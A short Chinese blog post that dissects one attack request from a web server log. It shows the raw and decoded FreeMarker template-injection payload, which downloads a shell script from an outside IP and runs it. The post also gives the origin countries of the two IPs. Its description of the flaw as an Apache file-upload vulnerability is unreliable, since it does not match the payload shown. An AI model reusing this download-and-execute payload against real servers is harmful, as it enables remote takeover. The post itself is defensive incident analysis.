web log 中出現了這一筆:
79.110.63.140 - - [27/Dec/2022:10:22:53 +0800] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid%3D%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.216.71.69%2Fvm.sh%3B%20chmod%20777%20vm.sh%3B%20sh%20vm.sh%22%29%7D HTTP/1.1" 400 226 "-" "Mozilla/5.0 (Windows NT 10.0%3B Win64%3B x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
來源 IP: 79.110.63.140 來自德國
中間那段解碼後得到:
/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http://185.216.71.69/vm.sh; chmod 777 vm.sh; sh vm.sh")}
這是一個 Apache裡的漏洞, 允許攻擊者通過上傳惡意文件執行任意命令
其中文中的 IP: 185.216.71.69 連線到保加利亞
下載其中的 vm.sh, 內容如下, 看來是專門針對 Linux 系統來攻擊的
想要再繼續下載內容中連結的檔案結果都被防毒軟體擋掉了
沒有留言:
張貼留言